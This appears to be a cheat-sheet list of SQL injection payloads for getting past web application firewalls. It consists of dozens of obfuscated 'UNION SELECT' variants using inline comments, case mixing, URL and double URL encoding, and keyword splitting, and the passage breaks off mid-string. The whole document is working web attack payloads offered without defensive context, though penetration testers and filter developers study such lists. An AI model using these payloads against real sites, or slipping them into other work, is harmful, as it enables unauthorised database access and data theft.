1 # 2 # 3 # 4 #WAF Bypassing Strings: 5 6 /*!%55NiOn*/ /*!%53eLEct*/ 7 8 %55nion(%53elect 1,2,3)-- - 9 10 +union+distinct+select+ 11 12 +union+distinctROW+select+ 13 14 /**//*!12345UNION SELECT*//**/ 15 16 /**//*!50000UNION SELECT*//**/ 17 18 /**/UNION/**//*!50000SELECT*//**/ 19 20 /*!50000UniON SeLeCt*/ 21 22 union /*!50000%53elect*/ 23 24 +#uNiOn+#sEleCt 25 26 +#1q%0AuNiOn all#qa%0A#%0AsEleCt 27 28 /*!%55NiOn*/ /*!%53eLEct*/ 29 30 /*!u%6eion*/ /*!se%6cect*/ 31 32 +un/**/ion+se/**/lect 33 34 uni%0bon+se%0blect 35 36 %2f**%2funion%2f**%2fselect 37 38 union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A 39 40 REVERSE(noinu)+REVERSE(tceles) 41 42 /*--*/union/*--*/select/*--*/ 43 44 union (/*!/**/ SeleCT */ 1,2,3) 45 46 /*!union*/+/*!select*/ 47 48 union+/*!select*/ 49 50 /**/union/**/select/**/ 51 52 /**/uNIon/**/sEleCt/**/ 53 54 /**//*!union*//**//*!select*//**/ 55 56 /*!uNIOn*/ /*!SelECt*/ 57 58 +union+distinct+select+ 59 60 +union+distinctROW+select+ 61 62 +UnIOn%0d%0aSeleCt%0d%0a 63 64 UNION/*&test=1*/SELECT/*&pwn=2*/ 65 66 un?+un/**/ion+se/**/lect+ 67 68 +UNunionION+SEselectLECT+ 69 70 +uni%0bon+se%0blect+ 71 72 %252f%252a*/union%252f%252a /select%252f%252a*/ 73 74 /%2A%2A/union/%2A%2A/select/%2A%2A/ 75 76 %2f**%2funion%2f**%2fselect%2f**%2f 77 78 union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A 79 80 /*!UnIoN*/SeLecT+ 81 82 ## 83 # 84 # 85 #Union Select by PASS with Url Encoded Method: 86 87 %55nion(%53elect) 88 89 union%20distinct%20select 90 91 union%20%64istinctRO%57%20select 92 93 union%2053elect 94 95 %23?%0auion%20?%23?%0aselect 96 97 %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect 98 99 %55nion %53eLEct 100 101 u%6eion se%6cect 102 103 unio%6e %73elect 104 105 unio%6e%20%64istinc%74%20%73elect 106 107 uni%6fn distinct%52OW s%65lect 108 109 %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7